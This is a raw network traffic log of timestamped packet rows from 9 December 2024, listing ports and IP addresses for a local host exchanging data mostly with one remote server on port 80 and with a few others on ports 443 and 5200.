Dec 9, 2024 08:08:52.470839977 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.470865965 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.470879078 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.470931053 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.472541094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.472553968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.472563982 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.474028111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.474040031 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.475600958 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.475613117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.477195024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.477206945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.478751898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.478784084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.478816032 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.478889942 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.480372906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.480386972 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.480401993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.481367111 CET	80	49897	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:52.482892990 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.482939005 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.482988119 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.483033895 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.491161108 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.502765894 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.551537991 CET	49897	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:52.618248940 CET	49878	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:52.659332037 CET	443	49878	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:52.681848049 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:52.683159113 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:52.698235989 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.698249102 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.698332071 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.698913097 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.699306965 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.700401068 CET	443	49896	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.700470924 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.701071978 CET	443	49896	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.701312065 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.707191944 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.707200050 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.707371950 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.707458019 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.707463980 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.709327936 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.709337950 CET	443	49896	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.709436893 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.709762096 CET	49905	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.709786892 CET	443	49905	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.709964991 CET	443	49896	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.710148096 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.710149050 CET	49905	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.711728096 CET	49905	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.711736917 CET	443	49905	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:52.711827040 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:52.802665949 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:52.802731991 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:52.885721922 CET	443	49899	35.244.181.201	192.168.2.4
Dec 9, 2024 08:08:52.885821104 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:52.888674974 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:52.888679981 CET	443	49899	35.244.181.201	192.168.2.4
Dec 9, 2024 08:08:52.888904095 CET	443	49899	35.244.181.201	192.168.2.4
Dec 9, 2024 08:08:52.890779972 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:52.890866995 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:52.890897989 CET	443	49899	35.244.181.201	192.168.2.4
Dec 9, 2024 08:08:52.891020060 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:52.891020060 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:52.891302109 CET	443	49898	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.891482115 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.896641970 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.896652937 CET	443	49898	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.896742105 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.896831989 CET	443	49898	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.897067070 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.902427912 CET	443	49900	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.907335997 CET	443	49900	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.910661936 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.915812969 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.915819883 CET	443	49900	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.915884972 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.915961981 CET	443	49900	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:52.916014910 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:52.922131062 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:52.922920942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:52.995475054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.999551058 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.036149025 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.045331001 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:53.118881941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.119273901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.119330883 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.119946003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.120675087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.120723009 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.121442080 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.121454954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.121489048 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.122823954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.122838974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.122950077 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.156339884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.156429052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.156522989 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.156582117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.157341957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.157439947 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.158042908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.158055067 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.158092022 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.159452915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.160204887 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.160217047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.160252094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.161559105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.161607027 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.162280083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.162292004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.162331104 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.163687944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.163700104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.163742065 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.165112972 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.165126085 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.165177107 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.166536093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.166548014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.166896105 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.167946100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.167957067 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.168008089 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.169379950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.169392109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.169436932 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.170973063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.170985937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.172509909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.172544003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.174109936 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.174122095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.175672054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.175685883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.175694942 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.176441908 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.176651955 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.177272081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.177283049 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.178836107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.178848028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.179873943 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.180408001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.180419922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.180474997 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.181987047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.181999922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.182008982 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.182048082 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.182075024 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.183573008 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.183585882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.183620930 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.185134888 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.185148001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.185156107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.185184002 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.186716080 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.186728954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.188215971 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.188338995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.188350916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.188463926 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.189881086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.189893961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.189925909 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.191421986 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.191433907 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.191451073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.191469908 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.191497087 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.193053961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.193064928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.193182945 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.194595098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.194607019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.194645882 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.196135044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.196173906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.196281910 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.197757006 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.197768927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.197779894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.197814941 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.199331999 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.199343920 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.199392080 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.200886011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.200907946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.200937986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.202454090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.202518940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.202786922 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.204032898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.204083920 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.204085112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.205631018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.205642939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.205652952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.205848932 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.207204103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.207216024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.207264900 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.208822966 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.208843946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.208906889 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.210355043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.210366964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.210417032 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.211920977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.211931944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.211941957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.211983919 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.213519096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.213531971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.213645935 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.215071917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.215090036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.215137959 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.216692924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.216705084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.216768026 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.218255043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.218266964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.219265938 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.219811916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.219824076 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.219835043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.220366955 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.221390963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.221400976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.221441031 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.222951889 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.223006010 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.223056078 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.224522114 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.224534035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.226151943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.226164103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.226556063 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.227703094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.227715015 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.227754116 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.229284048 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.229296923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.229332924 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.230837107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.230848074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.230858088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.230884075 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.232422113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.232433081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.232506037 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.234004021 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.234028101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.234114885 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.235578060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.235589981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.235649109 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.237128019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.237152100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.237178087 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.238714933 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.238728046 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.238738060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.238764048 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.238790035 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.240407944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.240420103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.240602970 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.241888046 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.241899967 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.243442059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.243482113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.243554115 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.245049953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.245063066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.245228052 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.246608973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.246622086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.246633053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.246661901 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.248173952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.248186111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.248264074 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.249748945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.249761105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.250294924 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.251346111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.251358032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.251502991 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.252912998 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.252924919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.252935886 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.252962112 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.252974987 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.254507065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.254518032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.254554987 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.256052971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.256064892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.256099939 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.257651091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.257663012 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.257699013 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.259232044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.259244919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.259279966 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.260803938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.260816097 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.260826111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.260852098 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.262399912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.262413025 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.262614965 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.263933897 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.263977051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.264013052 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.265526056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.265546083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.265876055 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.267105103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.267117977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.267128944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.267168999 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.267204046 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:53.268701077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.268722057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.270277023 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.270288944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:53.271271944 CET	49886	80	192.168.2.4	185.215.113.16
